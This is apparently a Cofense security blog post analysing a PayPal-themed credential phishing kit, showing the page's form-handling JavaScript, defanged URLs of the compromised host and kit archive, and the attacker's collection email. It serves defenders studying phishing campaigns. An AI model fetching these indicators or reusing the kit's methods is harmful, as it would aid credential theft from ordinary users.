Catching a Phresh Kit

Let’s follow this Phresh Catch and see where it takes us. We test the shortened link (the simplest of techniques to try and evade URL wrapping) and end up at a compromised GoDaddy hosted website – hxxp://teqzoft[.]com/websinfo/Confirm/websc_signin/.

Credential Phish Landing Page

Clean and basic, as long as you ignore the URL. It should be noted that attempting to connect to the phishing site over HTTP was unstable, hence the above connection over HTTPS. Continuing down the phish hole, we want to see how the phished credentials are saved or where they sent. A quick check of the source code reveals two JS scripts loaded.

<script type="text/javascript" src="../../lib/js/jquery.js"></script>
<script type="text/javascript" src="../../lib/js/login.js"></script>

jquery.js is a legitimate minimized jquery script file, it’s MD5 hash did not match the file downloaded directly from jquery.com but a quick diff of both files and ignoring all space revealed that they were identical. And login.js only handles UI functionality.

$(document).ready(function() {
    $("#formulario").submit(function(a) {
        a.preventDefault();
        var b = 0;
        $("#emay-add").val() || ($("#emay-add").parent().next(".ghalat-assi").addClass("show"), 
        $("#emay-add").addClass("error-motalat"), b = 1), $("#password").val() || ($("#password").parent().next(".ghalat-assi").addClass("show"), 
        $("#password").addClass("error-motalat"), $(".a-n-o-n-i-s-m-a").css("z-index: 100;"), 
        b = 1), 1 != b && ($(".dorawlididor").addClass("load-dayra"), $(".anchofhhh").show(), 
        setTimeout(function() {
            document.getElementById("formulario").submit();
        }, 1500));
    }), $("#emay-add").focus(function(a) {
        $("#emay-add").parent().next(".ghalat-assi").removeClass("show");
    }), $("#password").focus(function(a) {
        $("#password").parent().next(".ghalat-assi").removeClass("show");
    });
});

Is this the bottom of the phish hole? Let’s hope not. Many attackers are lazy and will leave the original zip archive on the server available for download. This common technique has already been discussed by the industry so we will leave it up to the reader to investigate further. Using this technique, we were able to download the original phish kit from hxxp://teqzoft[.]com/websinfo.zip. With a cursory code review of this phishing kit we quickly identify it as an old and already analyzed kit called Scam Paypal v1.10 by the author Shadow Z118. And now we know that the forwarding of phished information is achieved through email and performed by the PHP scripts. And the configured email for this campaign was pollwallens20140@yandex.com.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.